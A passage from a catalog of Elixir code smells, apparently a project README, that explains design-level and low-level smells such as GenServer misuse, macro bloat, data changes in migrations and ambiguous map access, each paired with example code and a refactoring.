* __Example:__ An example of this code smell, as shown below, is a library that implements arithmetic operations (e.g., add, subtract) by means of a ``GenServer`` process<sup>[link][GenServer]</sup>. If the number of calls to this single process grows, this code organization can compromise the system's performance, turning the process into a bottleneck.
```elixir
defmodule Calculator do
use GenServer
@moduledoc """
Calculator that performs two basic arithmetic operations.
This code is unnecessarily organized by a GenServer process.
"""
@doc """
Function to perform the sum of two values.
"""
def add(a, b, pid) do
GenServer.call(pid, {:add, a, b})
end
@doc """
Function to perform subtraction of two values.
"""
def subtract(a, b, pid) do
GenServer.call(pid, {:subtract, a, b})
end
def init(init_arg) do
{:ok, init_arg}
end
def handle_call({:add, a, b}, _from, state) do
{:reply, a + b, state}
end
def handle_call({:subtract, a, b}, _from, state) do
{:reply, a - b, state}
end
end
# Start a generic server process
iex(1)> {:ok, pid} = GenServer.start_link(Calculator, :init)
{:ok, #PID<0.132.0>}
#...Use examples...
iex(2)> Calculator.add(1, 5, pid)
6
iex(3)> Calculator.subtract(2, 3, pid)
-1
```
* __Refactoring:__ In Elixir, as shown next, code organization must be done only by modules and functions. Whenever possible, a library should not impose specific behavior (such as parallelization) on its clients. It is better to delegate this behavioral decision to the developers of clients, thus increasing the potential for code reuse of a library.
```elixir
defmodule Calculator do
def add(a, b) do
a + b
end
def subtract(a, b) do
a - b
end
end
#...Use examples...
iex(1)> Calculator.add(1, 5)
6
iex(2)> Calculator.subtract(2, 3)
-1
```
This example is based on code provided in Elixir's official documentation. Source: [link][CodeOrganizationByProcessExample]
[▲ back to Index](#table-of-contents)
___
### Large code generation by macros
* __Category:__ Design-related smell.
* __Note:__ This smell was suggested by the community via issues ([#13][Large-code-generation-issue]).
* __Problem:__ This code smell is related to ``macros`` that generate too much code. When a ``macro`` generates a large amount of code, it impacts how the compiler and the runtime work. The reason is that Elixir may have to expand, compile, and execute the code multiple times, which makes compilation slower.
* __Example:__ The code shown below is an example of this smell. Imagine you are defining a router for a web application, where you could have macros like ``get/2``. On every invocation of the macro, which can be hundreds, the code inside ``get/2`` will be expanded and compiled, which can generate a large volume of code in total.
```elixir
defmodule Routes do
...
defmacro get(route, handler) do
quote do
route = unquote(route)
handler = unquote(handler)
if not is_binary(route) do
raise ArgumentError, "route must be a binary"
end
if not is_atom(handler) do
raise ArgumentError, "route must be a module"
end
@store_route_for_compilation {route, handler}
end
end
end
```
* __Refactoring:__ To remove this code smell, the developer must simplify the ``macro``, delegating to other functions part of its work. As shown below, by encapsulating in the function ``__define__/3`` the functionality pre-existing inside the ``quote``, we reduce the code that is expanded and compiled on every invocation of the ``macro``, and instead we dispatch to a function to do the bulk of the work.
```elixir
defmodule Routes do
...
defmacro get(route, handler) do
quote do
Routes.__define__(__MODULE__, unquote(route), unquote(handler))
end
end
def __define__(module, route, handler) do
if not is_binary(route) do
raise ArgumentError, "route must be a binary"
end
if not is_atom(handler) do
raise ArgumentError, "route must be a module"
end
Module.put_attribute(module, :store_route_for_compilation, {route, handler})
end
end
```
This example and the refactoring are proposed by José Valim ([@josevalim][jose-valim])
[▲ back to Index](#table-of-contents)
___
### Data manipulation by migration
* __Category:__ Design-related smell.
* __Problem:__ This code smell refers to modules that perform both data and structural changes in a database schema via ``Ecto.Migration``<sup>[link][Migration]</sup>. Migrations must be used exclusively to modify a database schema over time (e.g., by including or excluding columns and tables). When this responsibility is mixed with data manipulation code, the module becomes less cohesive, more difficult to test, and therefore more prone to bugs.
* __Example:__ An example of this code smell is when an ``Ecto.Migration`` is used simultaneously to alter a table, adding a new column to it, and also to update all pre-existing data in that table, assigning a value to this new column. As shown below, in addition to adding the ``is_custom_shop`` column in the ``guitars`` table, this ``Ecto.Migration`` changes the value of this column for some specific guitar models.
```elixir
defmodule GuitarStore.Repo.Migrations.AddIsCustomShopToGuitars do
use Ecto.Migration
import Ecto.Query
alias GuitarStore.Inventory.Guitar
alias GuitarStore.Repo
@doc """
A function that modifies the structure of table "guitars",
adding column "is_custom_shop" to it. By default, all data
pre-stored in this table will have the value false stored
in this new column.
Also, this function updates the "is_custom_shop" column value
of some guitar models to true.
"""
def change do
alter table("guitars") do
add :is_custom_shop, :boolean, default: false
end
create index("guitars", ["is_custom_shop"])
custom_shop_entries()
|> Enum.map(&update_guitars/1)
end
@doc """
A function that updates values of column "is_custom_shop" to true.
"""
defp update_guitars({make, model, year}) do
from(g in Guitar,
where: g.make == ^make and g.model == ^model and g.year == ^year,
select: g
)
|> Repo.update_all(set: [is_custom_shop: true])
end
@doc """
Function that defines which guitar models that need to have the values
of the "is_custom_shop" column updated to true.
"""
defp custom_shop_entries() do
[
{"Gibson", "SG", 1999},
{"Fender", "Telecaster", 2020}
]
end
end
```
You can run this smelly migration above by going to the root of your project and typing the next command via console:
```elixir
mix ecto.migrate
```
* __Refactoring:__ To remove this code smell, it is necessary to separate the data manipulation in a ``mix task`` <sup>[link][MixTask]</sup> different from the module that performs the structural changes in the database via ``Ecto.Migration``. This separation of responsibilities is a best practice for increasing code testability. As shown below, the module ``AddIsCustomShopToGuitars`` now use ``Ecto.Migration`` only to perform structural changes in the database schema:
```elixir
defmodule GuitarStore.Repo.Migrations.AddIsCustomShopToGuitars do
use Ecto.Migration
@doc """
A function that modifies the structure of table "guitars",
adding column "is_custom_shop" to it. By default, all data
pre-stored in this table will have the value false stored
in this new column.
"""
def change do
alter table("guitars") do
add :is_custom_shop, :boolean, default: false
end
create index("guitars", ["is_custom_shop"])
end
end
```
Furthermore, the new mix task ``PopulateIsCustomShop``, shown next, has only the responsibility to perform data manipulation, thus improving testability:
```elixir
defmodule Mix.Tasks.PopulateIsCustomShop do
@shortdoc "Populates is_custom_shop column"
use Mix.Task
import Ecto.Query
alias GuitarStore.Inventory.Guitar
alias GuitarStore.Repo
@requirements ["app.start"]
def run(_) do
custom_shop_entries()
|> Enum.map(&update_guitars/1)
end
defp update_guitars({make, model, year}) do
from(g in Guitar,
where: g.make == ^make and g.model == ^model and g.year == ^year,
select: g
)
|> Repo.update_all(set: [is_custom_shop: true])
end
defp custom_shop_entries() do
[
{"Gibson", "SG", 1999},
{"Fender", "Telecaster", 2020}
]
end
end
```
You can run this ``mix task`` above by typing the next command via console:
```elixir
mix populate_is_custom_shop
```
This example is based on code originally written by Carlos Souza. Source: [link][DataManipulationByMigrationExamples]
[▲ back to Index](#table-of-contents)
___
### Using App Configuration for libraries
* __Category:__ Design-related smells.
* __Note:__ Formerly known as "App configuration for code libs".
* __Problem:__ The ``Application Environment`` <sup>[link][ApplicationEnvironment]</sup> is a mechanism that can be used to parameterize values that will be used in several different places in a system implemented in Elixir. This parameterization mechanism can be very useful and therefore is not considered a code smell by itself. However, when ``Application Environments`` are used as a mechanism for configuring a library's functions, this can make these functions less flexible, making it impossible for a library-dependent application to reuse its functions with different behaviors in different places in the code. Libraries are created to foster code reuse, so this limitation imposed by this parameterization mechanism can be problematic in this scenario.
* __Example:__ The ``DashSplitter`` module represents a library that configures the behavior of its functions through the global ``Application Environment`` mechanism. These configurations are concentrated in the ``config/config.exs`` file, shown below:
```elixir
import Config
config :app_config,
parts: 3
import_config "#{config_env()}.exs"
```
One of the functions implemented by the ``DashSplitter`` library is ``split/1``. This function has the purpose of separating a string received via parameter into a certain number of parts. The character used as a separator in ``split/1`` is always ``"-"`` and the number of parts the string is split into is defined globally by the ``Application Environment``. This value is retrieved by the ``split/1`` function by calling ``Application.fetch_env!/2``, as shown next:
```elixir
defmodule DashSplitter do
def split(string) when is_binary(string) do
parts = Application.fetch_env!(:app_config, :parts) # <= retrieve parameterized value
String.split(string, "-", parts: parts) # <= parts: 3
end
end
```
Due to this type of parameterized value used by the ``DashSplitter`` library, all applications dependent on it can only use the ``split/1`` function with identical behavior in relation to the number of parts generated by string separation. Currently, this value is equal to 3, as we can see in the use examples shown below:
```elixir
iex(1)> DashSplitter.split("Lucas-Francisco-Vegi")
["Lucas", "Francisco", "Vegi"]
iex(2)> DashSplitter.split("Lucas-Francisco-da-Matta-Vegi")
["Lucas", "Francisco", "da-Matta-Vegi"]
```
* __Refactoring:__ To remove this code smell and make the library more adaptable and flexible, this type of configuration must be performed via parameters in function calls. The code shown below performs the refactoring of the ``split/1`` function by adding a new optional parameter of type ``Keyword list``. With this new parameter it is possible to modify the default behavior of the function at the time of its call, allowing multiple different ways of using ``split/2`` within the same application:
```elixir
defmodule DashSplitter do
def split(string, opts \\ []) when is_binary(string) and is_list(opts) do
parts = Keyword.get(opts, :parts, 2) # <= default config of parts == 2
String.split(string, "-", parts: parts)
end
end
#...Use examples...
iex(1)> DashSplitter.split("Lucas-Francisco-da-Matta-Vegi", [parts: 5])
["Lucas", "Francisco", "da", "Matta", "Vegi"]
iex(2)> DashSplitter.split("Lucas-Francisco-da-Matta-Vegi") #<= default config is used!
["Lucas", "Francisco-da-Matta-Vegi"]
```
These examples are based on code provided in Elixir's official documentation. Source: [link][AppConfigurationForCodeLibsExample]
[▲ back to Index](#table-of-contents)
___
### Compile-time global configuration
* __Category:__ Design-related smells.
* __Note:__ Formerly known as "Compile-time app configuration".
* __Problem:__ As explained in the description of [Using App Configuration for libraries](#using-app-configuration-for-libraries), the ``Application Environment`` can be used to parameterize values in an Elixir system. Although it is not a good practice to use this mechanism in the implementation of libraries, sometimes this can be unavoidable. If these parameterized values are assigned to ``module attributes``, it can be especially problematic. As ``module attribute`` values are defined at compile-time, when trying to assign ``Application Environment`` values to these attributes, warnings or errors can be triggered by Elixir. This happens because, when defining module attributes at compile time, the ``Application Environment`` is not yet available in memory.
* __Example:__ The ``DashSplitter`` module represents a library. This module has an attribute ``@parts`` that has its constant value defined at compile-time by calling ``Application.fetch_env!/2``. The ``split/1`` function, implemented by this library, has the purpose of separating a string received via parameter into a certain number of parts. The character used as a separator in ``split/1`` is always ``"-"`` and the number of parts the string is split into is defined by the module attribute ``@parts``, as shown next:
```elixir
defmodule DashSplitter do
@parts Application.fetch_env!(:app_config, :parts) # <= define module attribute
# at compile-time
def split(string) when is_binary(string) do
String.split(string, "-", parts: @parts) #<= reading from a module attribute
end
end
```
Due to this compile-time configuration based on the ``Application Environment`` mechanism, Elixir can raise warnings or errors, as shown next, during compilation:
```elixir
warning: Application.fetch_env!/2 is discouraged in the module body,
use Application.compile_env/3 instead...
** (ArgumentError) could not fetch application environment :parts
for application :app_config because the application was not loaded nor
configured
```
* __Refactoring:__ To remove this code smell, when it is really unavoidable to use the ``Application Environment`` mechanism to configure library functions, this should be done at runtime and not during compilation. That is, instead of calling ``Application.fetch_env!(:app_config, :parts)`` at compile-time to set ``@parts``, this function must be called at runtime within ``split/1``. This will mitigate the risk that ``Application Environment`` is not yet available in memory when it is necessary to use it. Another possible refactoring, as shown below, is to replace the use of the ``Application.fetch_env!/2`` function to define ``@parts``, with the ``Application.compile_env/3``. The third parameter of ``Application.compile_env/3`` defines a default value that is returned whenever that ``Application Environment`` is not available in memory during the definition of ``@parts``. This prevents Elixir from raising an error at compile-time:
```elixir
defmodule DashSplitter do
@parts Application.compile_env(:app_config, :parts, 3) # <= default value 3 prevents an error!
def split(string) when is_binary(string) do
String.split(string, "-", parts: @parts) #<= reading from a module attribute
end
end
```
These examples are based on code provided in Elixir's official documentation. Source: [link][AppConfigurationForCodeLibsExample]
* __Remark:__ This code smell can be detected by [Credo][Credo], a static code analysis tool. During its checks, Credo raises this [warning][CredoWarningApplicationConfigInModuleAttribute] when this smell is found.
[▲ back to Index](#table-of-contents)
___
### "Use" instead of "import"
* __Category:__ Design-related smells.
* __Note:__ Formerly known as "Dependency with "use" when an "import" is enough".
* __Problem:__ Elixir has mechanisms such as ``import``, ``alias``, and ``use`` to establish dependencies between modules. Establishing dependencies allows a module to call functions from other modules, facilitating code reuse. A code implemented with these mechanisms does not characterize a smell by itself; however, while the ``import`` and ``alias`` directives have lexical scope and only facilitate that a module to use functions of another, the ``use`` directive has a broader scope, something that can be problematic. The ``use`` directive allows a module to inject any type of code into another, including propagating dependencies. In this way, using the ``use`` directive makes code readability worse, because to understand exactly what will happen when it references a module, it is necessary to have knowledge of the internal details of the referenced module.
* __Example:__ The code shown below is an example of this smell. Three different modules are defined -- ``ModuleA``, ``Library``, and ``ClientApp``. ``ClientApp`` reuses code from ``Library`` via the ``use`` directive, but is unaware of its internal details. Therefore, when ``Library`` is referenced by ``ClientApp``, it injects into ``ClientApp`` all the content present in its ``__using__/1`` macro. Unaware of ``Library``'s internal details, ``ClientApp`` defines a local function ``foo/0``. This generates a conflict, because ``ModuleA`` also has a function ``foo/0`` and, when ``ClientApp`` referenced ``Library`` via the ``use`` directive, the dependency on ``ModuleA`` was propagated to it:
```elixir
defmodule ModuleA do
def foo do
"From Module A"
end
end
```
```elixir
defmodule Library do
defmacro __using__(_opts) do
quote do
import ModuleA # <= propagating dependencies!
def from_lib do
"From Library"
end
end
end
def from_lib do
"From Library"
end
end
```
```elixir
defmodule ClientApp do
use Library
def foo do
"Local function from client app"
end
def from_client_app do
from_lib() <> " - " <> foo()
end
end
```
When we try to compile ``ClientApp``, Elixir will detect the conflict and throw the following error:
```elixir
iex(1)> c("client_app.ex")
** (CompileError) client_app.ex:4: imported ModuleA.foo/0 conflicts with local function
```
* __Refactoring:__ To remove this code smell, it may be possible to replace ``use`` with ``alias`` or ``import`` when creating a dependency between an application and a library. This will make code behavior clearer, due to improved readability. In the following code, ``ClientApp`` was refactored in this way, and with that, the conflict as previously shown no longer exists:
```elixir
defmodule ClientApp do
  import Library

  def foo do
    "Local function from client app"
  end

  def from_client_app do
    from_lib() <> " - " <> foo()
  end
end
#...Uses example...
iex(1)> ClientApp.from_client_app()
"From Library - Local function from client app"
```
These examples are based on code provided in Elixir's official documentation. Source: [link][DependencyWithUseExample]
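For reference, a minimal sketch of the ``alias``-style alternative mentioned above is shown next. It assumes the same ``Library`` module defined earlier and simply calls its function with an explicit module name, so nothing from ``ModuleA`` is injected into ``ClientApp``:
```elixir
defmodule ClientApp do
  # For a nested module, `alias My.Nested.Library` (hypothetical name) would let us
  # keep calling it by the short name `Library`; for a top-level module the explicit,
  # fully qualified call below is already enough.
  def foo do
    "Local function from client app"
  end

  def from_client_app do
    Library.from_lib() <> " - " <> foo()
  end
end
```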
[▲ back to Index](#table-of-contents)
## Low-level concerns smells
Low-level concerns smells are simpler than design-related smells and affect a small part of the code. Next, all 9 different smells classified as low-level concerns are explained and exemplified:
### Working with invalid data
* __Category:__ Low-level concerns smells.
* __Problem:__ This code smell refers to a function that does not validate its parameters' types and can therefore produce unpredictable internal behavior. When an error is raised deep inside a function because of an invalid parameter value, it can confuse developers and make it harder to locate and fix the error.
* __Example:__ An example of this code smell is when a function receives an invalid parameter and then passes it to a function from a third-party library. This will cause an error (raised deep inside the library function), which may be confusing for the developer who is working with invalid data. As shown next, the function ``foo/1`` is a client of a third-party library and doesn't validate its parameters at the boundary. In this way, it is possible that invalid data will be passed from ``foo/1`` to the library, causing a mysterious error.
```elixir
defmodule MyApp do
  alias ThirdPartyLibrary, as: Library

  def foo(invalid_data) do
    #...some code...
    Library.sum(1, invalid_data)
    #...some code...
  end
end

#...Use examples...
# with valid data is ok
iex(1)> MyApp.foo(2)
3
# with invalid data it causes a confusing error deep inside
iex(2)> MyApp.foo("Lucas")
** (ArithmeticError) bad argument in arithmetic expression: 1 + "Lucas"
:erlang.+(1, "Lucas")
library.ex:3: ThirdPartyLibrary.sum/2
```
* __Refactoring:__ To remove this code smell, client code must validate input parameters at the boundary with the user, via guard clauses or pattern matching. This prevents errors from occurring deep inside the library, making them easier to understand. This refactoring also allows libraries to be implemented without worrying about creating internal protection mechanisms. The next code illustrates the refactoring of ``foo/1``, removing this smell:
```elixir
defmodule MyApp do
  alias ThirdPartyLibrary, as: Library

  def foo(data) when is_integer(data) do
    #...some code...
    Library.sum(1, data)
    #...some code...
  end
end

#...Use examples...
# with valid data is ok
iex(1)> MyApp.foo(2)
3
# with invalid data errors are easy to locate and fix
iex(2)> MyApp.foo("Lucas")
** (FunctionClauseError) no function clause matching in MyApp.foo/1
The following arguments were given to MyApp.foo/1:
# 1
"Lucas"
my_app.ex:6: MyApp.foo/1
```
This example is based on code provided in Elixir's official documentation. Source: [link][WorkingWithInvalidDataExample]
[▲ back to Index](#table-of-contents)
___
### Complex branching
* __Category:__ Low-level concerns smell.
* __Note:__ Formerly known as "Complex API error handling".
* __Problem:__ When a function assumes the responsibility of handling multiple errors alone, its cyclomatic complexity (a control-flow metric) can increase and the function can become incomprehensible. This situation can constitute a specific instance of "Long function", a traditional code smell, but it has implications of its own. Under these circumstances, the function can become very confusing, difficult to maintain and test, and therefore bug-prone.
* __Example:__ An example of this code smell is when a function uses the ``case`` control-flow structure or other similar constructs (e.g., ``cond``, or ``receive``) to handle multiple variations of response types returned by the same API endpoint. This practice can make the function more complex, long, and difficult to understand, as shown next.
```elixir
def get_customer(customer_id) do
  case get("/customers/#{customer_id}") do
    {:ok, %Tesla.Env{status: 200, body: body}} -> {:ok, body}
    {:ok, %Tesla.Env{body: body}} -> {:error, body}
    {:error, _} = other -> other
  end
end
```
Although ``get_customer/1`` is not really long in this example, it could be. In a more complex scenario, where a large number of different responses can be returned by the same endpoint, it is not a good idea to concentrate all of the handling in a single function. This is a risky scenario, where a small typo, or any problem introduced by the programmer in the handling of one response type, could eventually compromise the handling of all responses from the endpoint (if the function raises an exception, for example).
* __Refactoring:__ As shown below, in this situation, instead of concentrating all the handling within the same function and creating complex branching, it is better to delegate each branch (the handling of one response type) to a different private function. In this way, the code becomes cleaner, more concise, and more readable.
```elixir
def get_customer(customer_id) when is_integer(customer_id) do
  case get("/customers/#{customer_id}") do
    {:ok, %Tesla.Env{status: 200, body: body}} -> success_api_response(body)
    {:ok, %Tesla.Env{body: body}} -> x_error_api_response(body)
    {:error, _} = other -> y_error_api_response(other)
  end
end

defp success_api_response(body) do
  {:ok, body}
end

defp x_error_api_response(body) do
  {:error, body}
end

defp y_error_api_response(other) do
  other
end
```
While this refactoring of ``get_customer/1`` might seem more verbose than the original code, imagine a scenario where ``get_customer/1`` is responsible for handling many more than three different types of possible responses. That is the smelly scenario!
This example is based on code written by Zack <sup>[MrDoops][MrDoops]</sup> and Dimitar Panayotov <sup>[dimitarvp][dimitarvp]</sup>. Source: [link][ComplexErrorHandleExample]. We got suggestions from José Valim ([@josevalim][jose-valim]) on the refactoring.
[▲ back to Index](#table-of-contents)
___
### Complex else clauses in with
* __Category:__ Low-level concerns smell.
* __Note:__ This smell was suggested by the community via issues ([#7][Complex-else-clauses-in-with-issue]).
* __Problem:__ This code smell refers to ``with`` statements that flatten all their error clauses into a single complex ``else`` block. This situation harms readability and maintainability because it is difficult to know which clause the error value came from.
* __Example:__ An example of this code smell, as shown below, is a function ``open_decoded_file/1`` that reads Base64-encoded content from a file and returns the decoded binary string. This function uses a ``with`` statement that needs to handle two possible errors, both of which are concentrated in a single complex ``else`` block.
```elixir
def open_decoded_file(path) do
  with {:ok, encoded} <- File.read(path),
       {:ok, value} <- Base.decode64(encoded) do
    value
  else
    {:error, _} -> :badfile
    :error -> :badencoding
  end
end
```
* __Refactoring:__ As shown below, in this situation, instead of concentrating all the error handling within a single complex ``else`` block, it is better to normalize the return types in dedicated private functions. In this way, the code becomes better organized, cleaner, and more readable.
```elixir
def open_decoded_file(path) do
  with {:ok, encoded} <- file_read(path),
       {:ok, value} <- base_decode64(encoded) do
    value
  end
end

defp file_read(path) do
  case File.read(path) do
    {:ok, contents} -> {:ok, contents}
    {:error, _} -> :badfile
  end
end

defp base_decode64(contents) do
  case Base.decode64(contents) do
    {:ok, contents} -> {:ok, contents}
    :error -> :badencoding
  end
end
```
This example and the refactoring are proposed by José Valim ([@josevalim][jose-valim])
[▲ back to Index](#table-of-contents)
___
### Alternative return types
* __Category:__ Low-level concerns smell.
* __Note:__ This smell was suggested by the community via issues ([#6][Alternative-return-type-issue]).
* __Problem:__ This code smell refers to functions that receive an options parameter (e.g., a ``keyword list``) that drastically changes their return type. Because options are optional and sometimes set dynamically, if they change the return type it may be hard to understand what the function actually returns.
* __Example:__ An example of this code smell, as shown below, is when a library (e.g. ``AlternativeInteger``) has a multi-clause function ``parse/2`` with many alternative return types. Depending on the options received as a parameter, the function will have a different return type.
```elixir
defmodule AlternativeInteger do
  def parse(string, opts) when is_list(opts) do
    case opts[:discard_rest] do
      true -> # only an integer value converted from the string parameter
      _ -> # another return type (e.g., a tuple)
    end
  end

  def parse(string, opts \\ :default) do
    # another return type (e.g., a tuple)
  end
end
#...Use examples...
iex(1)> AlternativeInteger.parse("13")
{13, "..."}
iex(2)> AlternativeInteger.parse("13", discard_rest: true)
13
iex(3)> AlternativeInteger.parse("13", discard_rest: false)
{13, "..."}
```
* __Refactoring:__ To refactor this smell, as shown next, it's better to add to the library a specific function for each return type (e.g., ``parse_no_rest/1``), no longer delegating this decision to an options parameter (a concrete sketch using ``Integer.parse/1`` follows the example below).
```elixir
defmodule AlternativeInteger do
  def parse_no_rest(string) do
    # only an integer value converted from the string parameter
  end

  def parse(string) do
    # another return type (e.g., a tuple)
  end
end
#...Use examples...
iex(1)> AlternativeInteger.parse("13")
{13, "..."}
iex(2)> AlternativeInteger.parse_no_rest("13")
13
```
This example and the refactoring are proposed by José Valim ([@josevalim][jose-valim])
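As an illustration only (not part of the original example), the placeholder bodies above could be filled in using Elixir's built-in ``Integer.parse/1``, which already returns a tuple with the parsed integer and the remainder of the string:
```elixir
defmodule AlternativeInteger do
  # Returns only the parsed integer, discarding the rest of the string
  # (raises a MatchError if the string cannot be parsed as an integer).
  def parse_no_rest(string) do
    {int, _rest} = Integer.parse(string)
    int
  end

  # Returns a {integer, rest} tuple, mirroring Integer.parse/1.
  def parse(string) do
    Integer.parse(string)
  end
end

#...Use examples...
iex(1)> AlternativeInteger.parse("13")
{13, ""}
iex(2)> AlternativeInteger.parse_no_rest("13")
13
```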
[▲ back to Index](#table-of-contents)
___
### Accessing non-existent Map/Struct fields
* __Category:__ Low-level concerns smells.
* __Note:__ Formerly known as "Map/struct dynamic access".
* __Problem:__ In Elixir, it is possible to access values from ``Maps``, which are key-value data structures, either strictly or dynamically. When dynamically accessing the value of a key in a ``Map``, if the given key does not exist, a null value (``nil``) is returned. This return can be confusing and does not allow developers to conclude whether the key is absent from the ``Map`` or just has no bound value. In this way, this code smell may cause bugs in the code.
* __Example:__ The code shown below is an example of this smell. The function ``plot/1`` tries to draw a graphic representing the position of a point in a Cartesian plane. This function receives a ``Map`` parameter with the point's attributes, which can describe a point in a 2D or 3D Cartesian coordinate system. To decide whether a point is 2D or 3D, this function uses dynamic access to retrieve the values of the ``Map`` keys:
```elixir
defmodule Graphics do
  def plot(point) do
    #...some code...
    # Dynamic access to use point values
    {point[:x], point[:y], point[:z]}
    #...some code...
  end
end
#...Use examples...
iex(1)> point_2d = %{x: 2, y: 3}
%{x: 2, y: 3}
iex(2)> point_3d = %{x: 5, y: 6, z: nil}
%{x: 5, y: 6, z: nil}
iex(3)> Graphics.plot(point_2d)
{2, 3, nil} # <= ambiguous return
iex(4)> Graphics.plot(point_3d)
{5, 6, nil}
```
As can be seen in the example above, even when the key ``:z`` does not exist in the ``Map`` (``point_2d``), dynamic access returns the value ``nil``. This return can be dangerous because of its ambiguity. It is not possible to conclude from it whether the ``Map`` has the key ``:z`` or not. If the function relies on the return value to make decisions about how to plot a point, this can be problematic and even cause errors when testing the code.
* __Refactoring:__ To remove this code smell, whenever a ``Map`` has keys of ``Atom`` type, replace dynamic access to its values with strict access. When a non-existent key is strictly accessed, Elixir raises an error immediately, allowing developers to find bugs faster. The next code illustrates the refactoring of ``plot/1``, removing this smell:
```elixir
defmodule Graphics do
  def plot(point) do
    #...some code...
    # Strict access to use point values
    {point.x, point.y, point.z}
    #...some code...
  end
end
#...Use examples...
iex(1)> point_2d = %{x: 2, y: 3}
%{x: 2, y: 3}
iex(2)> point_3d = %{x: 5, y: 6, z: nil}
%{x: 5, y: 6, z: nil}
iex(3)> Graphics.plot(point_2d)
** (KeyError) key :z not found in: %{x: 2, y: 3} # <= explicitly warns that
graphic.ex:6: Graphics.plot/1 # <= the z key does not exist!
iex(4)> Graphics.plot(point_3d)
{5, 6, nil}
```
As shown below, another alternative to refactor this smell is to replace a ``Map`` with a ``struct`` (named map). By default, structs only support strict access to values. In this way, accesses will always return clear and objective results:
```elixir
defmodule Point do
  @enforce_keys [:x, :y]
  defstruct [x: nil, y: nil]
end
#...Use examples...
iex(1)> point = %Point{x: 2, y: 3}
%Point{x: 2, y: 3}
iex(2)> point.x # <= strict access to use point values
2
iex(3)> point.z # <= trying to access a non-existent key
** (KeyError) key :z not found in: %Point{x: 2, y: 3}
iex(4)> point[:x] # <= by default, struct does not support dynamic access
** (UndefinedFunctionError) ... (Point does not implement the Access behaviour)
```
These examples are based on code written by José Valim ([@josevalim][jose-valim]). Source: [link][JoseValimExamples]
[▲ back to Index](#table-of-contents)
___
### Speculative Assumptions
* __Category:__ Low-level concerns smells.
* __Note:__ Formerly known as "Unplanned value extraction".
* __Problem:__ Overall, Elixir applications are composed of many supervised processes, so the effects of an error are localized in a single process and do not propagate to the entire application. A supervisor detects the failing process and restarts it at that level. For this type of design to behave well, it's important that problematic code crashes when it fails to fulfill its purpose. However, some code may have undesired behavior by making assumptions we have not really planned for, such as returning incorrect values instead of forcing a crash. These speculative assumptions can give a false impression that the code is working correctly.
* __Example:__ The code shown below is an example of this smell. The function ``get_value/2`` tries to extract a value from a specific key of a URL query string. As it is not implemented using pattern matching, ``get_value/2`` always returns a value, regardless of the format of the URL query string passed as a parameter in the call. Sometimes the returned value will be valid; however, if a URL query string with an unexpected format is used in the call, ``get_value/2`` will extract incorrect values from it:
```elixir
defmodule Extract do
  @doc """
  Extract value from a key in a URL query string.
  """
  def get_value(string, desired_key) do
    parts = String.split(string, "&")

    Enum.find_value(parts, fn pair ->
      key_value = String.split(pair, "=")
      Enum.at(key_value, 0) == desired_key && Enum.at(key_value, 1)
    end)
  end
end
#...Use examples...
# URL query string according to the planned format - OK!
iex(1)> Extract.get_value("name=Lucas&university=UFMG&lab=ASERG", "lab")
"ASERG"
iex(2)> Extract.get_value("name=Lucas&university=UFMG&lab=ASERG", "university")
"UFMG"
# Unplanned URL query string format - Unplanned value extraction!
iex(3)> Extract.get_value("name=Lucas&university=institution=UFMG&lab=ASERG", "university")
"institution" # <= why not "institution=UFMG"? or only "UFMG"?
```
* __Refactoring:__ To remove this code smell, ``get_value/2`` can be refactored through the use of pattern matching. If an unexpected URL query string format is used, the function will crash instead of returning an invalid value. This behavior, shown below, allows clients to decide how to handle these errors and does not give the false impression that the code is working correctly when unexpected values are extracted:
```elixir
defmodule Extract do
  @doc """
  Extract value from a key in a URL query string.
  Refactored by using pattern matching.
  """
  def get_value(string, desired_key) do
    parts = String.split(string, "&")

    Enum.find_value(parts, fn pair ->
      [key, value] = String.split(pair, "=") # <= pattern matching
      key == desired_key && value
    end)
  end
end
#...Use examples...
# URL query string according to the planned format - OK!
iex(1)> Extract.get_value("name=Lucas&university=UFMG&lab=ASERG", "name")
"Lucas"
# Unplanned URL query string format - Crash explaining the problem to the client!
iex(2)> Extract.get_value("name=Lucas&university=institution=UFMG&lab=ASERG", "university")
** (MatchError) no match of right hand side value: ["university", "institution", "UFMG"]
extract.ex:7: anonymous fn/2 in Extract.get_value/2 # <= left hand: [key, value] pair
iex(3)> Extract.get_value("name=Lucas&university&lab=ASERG", "university")
** (MatchError) no match of right hand side value: ["university"]
extract.ex:7: anonymous fn/2 in Extract.get_value/2 # <= left hand: [key, value] pair
```
These examples are based on code written by José Valim ([@josevalim][jose-valim]). Source: [link][JoseValimExamples]
[▲ back to Index](#table-of-contents)
___
### Modules with identical names
* __Category:__ Low-level concerns smells.
* __Problem:__ This code smell is related to possible module name conflicts that can occur when a library is implemented. Due to a limitation of the Erlang VM (BEAM), also used by Elixir, only one instance of a module can be loaded at a time. If there are name conflicts between more than one module, they will be considered the same by BEAM and only one of them will be loaded. This can cause unwanted code behavior.
* __Example:__ The code shown below is an example of this smell. Two different modules were defined with identical names (``Foo``). When BEAM tries to load both, only the module defined in the file ``module_two.ex`` stays loaded, redefining the version of ``Foo`` (from ``module_one.ex``) currently in memory. This makes it impossible to call ``from_module_one/0``, for example:
```elixir
defmodule Foo do
  @moduledoc """
  Defined in `module_one.ex` file.
  """
  def from_module_one do
    "Function from module one!"
  end
end
```
```elixir
defmodule Foo do
  @moduledoc """
  Defined in `module_two.ex` file.
  """
  def from_module_two do
    "Function from module two!"
  end
end
```
When BEAM tries to load both simultaneously, the name conflict causes only one of them to stay loaded:
```elixir
iex(1)> c("module_one.ex")
[Foo]
iex(2)> c("module_two.ex")
warning: redefining module Foo (current version defined in memory)
module_two.ex:1
[Foo]
iex(3)> Foo.from_module_two()
"Function from module two!"
iex(4)> Foo.from_module_one() # <= impossible to call due to name conflict
** (UndefinedFunctionError) function Foo.from_module_one/0 is undefined...
```
* __Refactoring:__ To remove this code smell, a library must standardize the naming of its modules, always using its own name as a prefix (namespace) for all of its module names (e.g., ``LibraryName.ModuleName``). When a module file is within subdirectories of a library, the names of the subdirectories must also be used in the module naming (e.g., ``LibraryName.SubdirectoryName.ModuleName``). In the refactored code shown below, this module naming pattern was used. For this, the ``Foo`` module defined in the file ``module_two.ex`` was also moved to the ``utils`` subdirectory. This refactoring, in addition to eliminating the internal name conflict within the library, prevents name conflicts with client code:
```elixir
defmodule MyLibrary.Foo do
  @moduledoc """
  Defined in `module_one.ex` file.
  Name refactored!
  """
  def from_module_one do
    "Function from module one!"
  end
end
```
```elixir
defmodule MyLibrary.Utils.Foo do
  @moduledoc """
  Defined in `module_two.ex` file.
  Name refactored!
  """
  def from_module_two do
    "Function from module two!"
  end
end
```
When BEAM tries to load them simultaneously, both will stay loaded successfully:
```elixir
